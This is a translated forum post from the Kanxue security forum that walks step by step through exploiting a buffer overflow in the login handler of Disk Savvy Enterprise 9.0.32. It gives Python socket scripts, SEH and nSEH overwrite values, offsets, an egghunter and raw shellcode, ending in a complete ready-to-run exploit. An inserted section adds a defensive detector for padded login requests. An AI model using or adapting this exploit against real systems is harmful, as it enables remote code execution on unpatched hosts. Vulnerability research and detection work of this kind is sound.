看雪论坛 (Kanxue Forum)

[Original] Disk Savvy Enterprise 9.0.32 (SEH overflow)

shuozhang 2017-3-4 10:31 470

Vulnerability: https://www.exploit-db.com/exploits/40459/

Disk Savvy Enterprise 9.0.32 - 'Login' Buffer Overflow

Environment: VirtualBox with Win7 Enterprise + Disk Savvy Enterprise 9.0.32 + Immunity Debugger + IDA

Run Disk Savvy Enterprise 9.0.32. The interface:

This is only the client side of the software; in its settings, enable the software's HTTP service.

Attach Immunity Debugger to the disksvs.exe process.

```
import socket
import sys

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.114',80))

evil =  "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "A" * 20000
s.send(evil)
s.close()
```

The program raises an exception; the SEH chain has been overwritten with AAAA.
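As an added example (not code from the original post or from the Disk Savvy product), here is a small offline detector for the request shape just described: a POST to /login whose form body is far larger than any real credential, padded with a long run of one repeated byte, and whose Content-Length does not match what is actually sent. The thresholds, the two sample requests and the 192.0.2.10 address are constructed for this illustration; the same checks apply to any login form, not just this product's.

```python
import re

# Assumed thresholds (constructed for this example, not from the original post):
MAX_FIELD_LEN = 512     # no legitimate login field should exceed this many bytes
MIN_REPEAT_RUN = 1024   # a run of one repeated byte this long is filler or a NOP sled


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, headers, body).

    Header names are lower-cased; values are decoded as latin-1 so that any
    byte value survives the round trip.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) < 2:
        raise ValueError("malformed request line")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return parts[0].decode("latin-1"), parts[1].decode("latin-1"), headers, body


def longest_run(data: bytes) -> int:
    """Length of the longest run of a single repeated byte value in data."""
    best = 0
    for match in re.finditer(rb"(.)\1*", data, re.DOTALL):
        best = max(best, len(match.group(0)))
    return best


def analyze_login_post(raw: bytes) -> list:
    """Return human-readable findings for one raw request; [] means nothing suspicious.

    Only POST /login is examined, matching the endpoint named in the advisory above.
    """
    findings = []
    method, path, headers, body = parse_request(raw)
    if method != "POST" or path != "/login":
        return findings

    # 1. Declared Content-Length that does not match the bytes actually sent.
    declared = headers.get("content-length", "")
    if declared.isdigit() and int(declared) != len(body):
        findings.append(f"content-length mismatch: declared {declared}, actual {len(body)}")

    # 2. Any form field far longer than a credential could plausibly be.
    for pair in body.split(b"&"):
        name, _, value = pair.partition(b"=")
        if len(value) > MAX_FIELD_LEN:
            label = name.decode("latin-1", "replace")
            findings.append(f"oversized form field {label!r}: {len(value)} bytes")

    # 3. Long stretches of one repeated byte: padding used to reach an overwrite target.
    run = longest_run(body)
    if run >= MIN_REPEAT_RUN:
        findings.append(f"repeated-byte run of {run} bytes (filler or NOP sled)")
    return findings


def build_login(body: bytes, declared_length=None) -> bytes:
    """Build a minimal POST /login request around body (constructed sample data)."""
    length = len(body) if declared_length is None else declared_length
    return (b"POST /login HTTP/1.1\r\n"
            b"Host: 192.0.2.10\r\n"   # documentation-range address, constructed
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: " + str(length).encode("ascii") + b"\r\n\r\n" + body)


# Constructed samples: an ordinary login, and a request shaped like the one in the
# post (filler appended after the password field, Content-Length understated).
BENIGN_LOGIN = build_login(b"username=admin&password=s3cret")
OVERSIZED_LOGIN = build_login(b"username=admin&password=aaaaa\r\n" + b"A" * 20000,
                              declared_length=17000)

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_LOGIN), ("oversized", OVERSIZED_LOGIN)):
        print(label, analyze_login_post(sample) or ["no findings"])
```

Any one of the three findings on its own is a reasonable alert for a reverse proxy or IDS in front of an HTTP management interface like this one; all three together on a login endpoint is the signature of a padded overflow attempt, and the repeated-byte check also catches the filler-heavy variants shown later in the post.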

Next, construct the SEH payload:

[junk][nSEH][SEH][nop+shellcode]

Next we need to work out the size that triggers the exception, the SEH offset, and a "POP POP RET" address.

```
evil += "&password=aaaaa\r\n"
evil += "A" * 12000
evil += "\x90" * 10000
```

Trigger the exception and compute the SEH offset: the difference is 2292.

Use the mona.py plugin (!mona seh) to find a "POP POP RET".

Change the payload to:

```
seh = "\xac\x43\x0c\x10"
nseh = "\xEB\x0B\x90\x90"
evil += "A" * 14292
evil += nseh
evil += seh
evil += "\x90" * 10000
s.send(evil)
s.close()
```

That executes successfully, but the memory available to hold the shellcode is too small, so use an egghunter to locate the shellcode in memory and then execute it.

The egghunter code:

```
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
egg = "w00tw00t"
```

Finally, the complete payload:

```
import socket
import sys
 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.114',80))
 
seh = "\xac\x43\x0c\x10"
nseh = "\xEB\x0B\x90\x90"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
shellcode = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x53\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x68\x6c\x6c\x42\x42\x88\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x6f\x78\x41\x42\x88\x4c\x24\x03\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd6\x83\xc4\x0c\x31\xd2\x31\xc9\x52\x68\x73\x68\x75\x7a\x8d\x14\x24\x51\x68\x73\x68\x75\x7a\x8d\x0c\x24\x31\xdb\x43\x53\x52\x51\x31\xdb\x53\xff\xd0\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\xd6\x31\xc9\x51\xff\xd0";
 
evil =  "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "A" * 14057 
evil += "w00tw00t"
evil += shellcode
evil += nseh
evil += seh
evil += egghunter
evil += "\x90" * 10000
s.send(evil)
s.close()
```


Finally, the problematic code is the getnextstring function in the libspp.dll module, which assigns the received value to heap address a5 and thereby triggers the exception.

